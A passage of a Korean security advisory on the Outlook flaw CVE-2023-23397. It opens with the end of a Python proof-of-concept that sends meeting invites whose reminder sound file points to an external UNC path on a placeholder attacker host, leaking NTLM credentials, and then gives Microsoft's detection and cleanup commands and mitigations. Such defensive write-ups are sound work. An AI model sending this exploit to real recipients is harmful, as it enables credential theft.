        mtg.MeetingStatus = 1
        mtg.Location = location
        for recipient in recipients:
            mtg.Recipients.Add(recipient)
        mtg.Subject = subject
        mtg.Start = outlook_date(time)
        mtg.Duration = 60
        mtg.ReminderMinutesBeforeStart = 30
        mtg.ResponseRequested = False
        mtg.Body = body
        mtg.ReminderSet = True
        mtg.ReminderOverrideDefault = True
        mtg.ReminderSoundFile = bad_location
        mtg.Save()
        mtg.Send()


if __name__ == "__main__":
    MEETING_SUBJECT:      str = "Test Of CVE-2023-23397"
    MEETING_BODY_TEXT:    str = "CVE-2023-23397 Test email"
    MEETING_LOCATION:     str = "Virtual"
    MEETING_RECIPIENTS: [str] = [
        'user@test.com',
        'user2@test.com'
    ]

    # External UNC location
    BAD_ADDRESS: str = "\\\\<your>.<bad>.<location>.<here>\\@<port>\\<file>.<extension>"

    import datetime
    ol = OutlookClient()

    # Set meeting time 3 hours from now
    meeting_time = datetime.datetime.now() + datetime.timedelta(hours=3)

    ol.send_meeting_request(MEETING_SUBJECT, meeting_time, MEETING_LOCATION, MEETING_RECIPIENTS, MEETING_BODY_TEXT,
                            BAD_ADDRESS)

3. 대응방안

① "PidLidReminderFileParameter"의 값이 UNC로 변경되었는지를 확인하여 피해 여부를 파악

- 3월 15일 Microsoft는 취약점이 Exchange 환경 내에 존재하는지 검사하는 스크립트 CVE-2023-23397.ps1 공개 [10]

⒜ 사전 준비

> Exchange Server (on-premises) : EMS(Exchange 관리 셸)에서 아래 PowerShell 명령을 실행

New-ThrottlingPolicy “CVE-2023-23397-Script”
Set-ThrottlingPolicy “CVE-2023-23397-Script” -EWSMaxConcurrency Unlimited -EWSMaxSubscriptions Unlimited -CPAMaxConcurrency Unlimited -EwsCutoffBalance Unlimited -EwsMaxBurst Unlimited -EwsRechargeRate Unlimited
Set-Mailbox -Identity “<UserWhoRunsTheScript>” -ThrottlingPolicy “CVE-2023-23397-Script”

> Exchange Online : 전역 관리자 또는 응용 프로그램 관리자 권한으로 실행

⒝ 점검 시작

⑴ 감사 모드(Audit Mode) : 스크립트는 속성이 채워진 항목의 세부 정보가 포함된 CSV 파일을 제공
> Exchange Server (on-premises)

Get-Mailbox -ResultSize Unlimited | .\CVE-2023-23397.ps1 -Environment Onprem

> Exchange Online

Get-Mailbox -ResultSize Unlimited | .\CVE-2023-23397.ps1 -Environment “Online”

⑵ 정리 모드(Cleanup Mode) : 스크립트는 속성을 지우거나 항목을 삭제하여 감지된 항목에 대한 정리를 수행
> Exchange Server (on-premises)

.\CVE-2023-23397.ps1 -Environment Onprem -CleanupAction ClearProperty -CleanupInfoFilePath <Path to modified CSV>

> Exchange Online

.\CVE-2023-23397.ps1 -CleanupAction ClearProperty -CleanupInfoFilePath <Path to modified CSV>

② 현재 사용중인 Outlook 버전 확인 후 최신 버전 업데이트 적용 [11]

- Outlook 실행 > 파일 > Office 계정 > Outlook 정보에 표시된 버전 확인

③ 미리 알림 해제

- 옵션 > 고급 > 미리 알림 > ‘미리 알림 표시’ 체크 해제

> 단, 해당 메일을 열어 ‘다음 소리 재생(Play this sound)’을 체크하고 소리를 재생할 시 취약점이 발현됨

④ 업데이트 적용이 불가한 경우 다음의 임시조치 적용

- SMB 포트 차단
> TCP 445/SMB 아웃바운드 트래픽을 차단

- NTLM 인증 사용 차단.
> 보호된 사용자 보안 그룹(Protected Users Security Group)에 계정을 추가해 NTLM을 인증을 사용하지 못하도록 한다.
※ NTLM이 필요한 서비스에 영향을 미칠 수 있으므로 영향도 검토 필요

⑤ 보안 장비에 IoC 등 침해지표 등록

4. 참조

[1] https://nvd.nist.gov/vuln/detail/CVE-2023-23397
[2] https://learn.microsoft.com/en-us/officeupdates/microsoft365-apps-security-updates
[3] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&pageIndex=1&nttId=71019&menuNo=205020
[4] https://www.balbix.com/blog/urgent-action-recommended-microsoft-outlook-vulnerability-cve-2023-23397/
[5] https://www.bleepingcomputer.com/news/security/critical-microsoft-outlook-bug-poc-shows-how-easy-it-is-to-exploit/
[6] https://blog.cyble.com/2023/03/16/microsoft-outlook-zero-day-vulnerability-cve-2023-23397-actively-exploited-in-the-wild/
[7] https://learn.microsoft.com/en-us/office/client-developer/outlook/mapi/pidlidreminderfileparameter-canonical-property
[8] https://learn.microsoft.com/en-us/office/client-developer/outlook/mapi/pidlidreminderoverride-canonical-property
[9] https://github.com/BillSkiCO/CVE-2023-23397_EXPLOIT/blob/main/cve-2023-23397.py
[10] https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/
[11] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
[12] https://www.boannews.com/media/view.asp?idx=115328&page=1&kind=1
[13] https://www.boannews.com/media/view.asp?idx=115278
[14] https://www.boannews.com/media/view.asp?idx=115324
[15] https://zdnet.co.kr/view/?no=20230320103605